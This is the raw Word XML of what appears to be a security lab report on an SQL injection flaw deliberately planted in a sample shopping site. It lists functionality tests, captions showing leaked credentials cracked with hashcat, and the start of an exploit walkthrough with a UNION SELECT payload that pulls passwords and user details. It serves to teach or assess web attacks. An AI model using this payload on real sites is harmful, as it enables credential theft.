        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455DC457" w14:textId="0975E62F" w:rsidR="00643C5A" w:rsidRPr="00643C5A" w:rsidRDefault="00643C5A" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643C5A">
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>See outcome for results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A803FD4" w14:textId="42D6CC05" w:rsidR="005645A0" w:rsidRDefault="005645A0" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005645A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FUNCTIONALITY TESTING:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5607964B" w14:textId="77777777" w:rsidR="00643C5A" w:rsidRDefault="00643C5A" w:rsidP="00643C5A">
      <w:r>
        <w:t>Login as existing user: successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1DA39E" w14:textId="16378872" w:rsidR="00643C5A" w:rsidRDefault="00643C5A" w:rsidP="00643C5A">
      <w:r>
        <w:t xml:space="preserve">Register new user: </w:t>
      </w:r>
      <w:r w:rsidR="004E22EB">
        <w:t>successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181AE594" w14:textId="77777777" w:rsidR="00643C5A" w:rsidRDefault="00643C5A" w:rsidP="00643C5A">
      <w:r>
        <w:t>Browse site: successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE617EF" w14:textId="77777777" w:rsidR="00643C5A" w:rsidRDefault="00643C5A" w:rsidP="00643C5A">
      <w:r>
        <w:t>Add products to shopping cart: successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13879C62" w14:textId="6B7A45A5" w:rsidR="005645A0" w:rsidRDefault="00643C5A" w:rsidP="00643C5A">
      <w:r>
        <w:t>Complete purchase: successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCEA8AD" w14:textId="711A1688" w:rsidR="004E22EB" w:rsidRPr="005645A0" w:rsidRDefault="004E22EB" w:rsidP="00643C5A">
      <w:r>
        <w:t>The implementation of the SQLi vulnerability has in no way compromised the functionality of the site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CBD21B" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592252F1" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447003F2" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EDDBFC9" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA53236" w14:textId="1854235F" w:rsidR="005645A0" w:rsidRDefault="005645A0" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005645A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1689DFCA" w14:textId="044D633A" w:rsidR="004E22EB" w:rsidRDefault="004E22EB" w:rsidP="00643C5A">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E44A50" wp14:editId="5ED565BA">
            <wp:extent cx="3429000" cy="1854200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="935729282" name="Picture 9357292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29282" name="Picture 935729282" descr="Graphical user interface, text, application&#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429000" cy="1854200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0A4752" w14:textId="425AF3FE" w:rsidR="004E22EB" w:rsidRPr="00643C5A" w:rsidRDefault="00643C5A" w:rsidP="00643C5A">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643C5A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00643C5A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: The login page with SQLi credential leak.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9298B2" w14:textId="77777777" w:rsidR="00643C5A" w:rsidRPr="00643C5A" w:rsidRDefault="00643C5A" w:rsidP="00643C5A">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643C5A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C3E18F" wp14:editId="30B11161">
            <wp:extent cx="4572000" cy="1162050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="175"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2" descr="Graphical user interface, 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0" cy="1162050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F88F26" w14:textId="762EB0F9" w:rsidR="00643C5A" w:rsidRPr="00643C5A" w:rsidRDefault="00643C5A" w:rsidP="00643C5A">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643C5A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00643C5A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: The leaked credential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62987E44" w14:textId="77777777" w:rsidR="00643C5A" w:rsidRPr="00643C5A" w:rsidRDefault="00643C5A" w:rsidP="00643C5A">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643C5A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13F47568" wp14:editId="2448CEFB">
            <wp:extent cx="4552950" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="176" name="Picture 1202805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202805448" descr="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52950" cy="1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC193C5" w14:textId="3BAC7F77" w:rsidR="005645A0" w:rsidRPr="004E22EB" w:rsidRDefault="00643C5A" w:rsidP="004E22EB">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643C5A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00643C5A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: Hashcat output on the leaked credential.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F35C68" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D64F46" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0F1152" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC970FA" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6E2D58" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE839ED" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7225F372" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB92744" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED94AA9" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3B69D8" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E48C38" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064739E3" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A170B5" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A1BDD2" w14:textId="77777777" w:rsidR="00B265CD" w:rsidRDefault="00B265CD" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B7FFBB6" w14:textId="2A6DCEC2" w:rsidR="005645A0" w:rsidRDefault="005645A0" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SQLi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VULNERABILITY/EXPLOIT WALKTHROUGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A575055" w14:textId="77777777" w:rsidR="005645A0" w:rsidRPr="005645A0" w:rsidRDefault="005645A0" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D9E1E2" w14:textId="1B7B1A68" w:rsidR="005645A0" w:rsidRDefault="005645A0" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005645A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TOOLS REQUIRED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0D0E9" w14:textId="15EE9627" w:rsidR="005645A0" w:rsidRPr="005645A0" w:rsidRDefault="005645A0" w:rsidP="00384B9F">
      <w:r>
        <w:t>No specialist tools required, but you may want to use an IDE that can syntax-check SQL queries</w:t>
      </w:r>
      <w:r w:rsidR="004E22EB">
        <w:t xml:space="preserve"> and hashcat to crack some leaked credentials</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE085C6" w14:textId="244A934A" w:rsidR="005645A0" w:rsidRDefault="005645A0" w:rsidP="00384B9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005645A0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>METHODS UTILIZED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F455FC" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="330" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Example SQL injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9386A2" w14:textId="77777777" w:rsidR="009B40A5" w:rsidRPr="009B40A5" w:rsidRDefault="009B40A5" w:rsidP="009B40A5">
      <w:pPr>
        <w:spacing w:line="330" w:lineRule="exact"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r w:rsidRPr="009B40A5">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
            <w:color w:val="0563C1" w:themeColor="hyperlink"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>bob@projex.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>country</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>city</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>contact</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>address</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>zipcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>profile</w:t>
      </w:r>
      <w:r w:rsidRPr="009B40A5">
        <w:rPr>
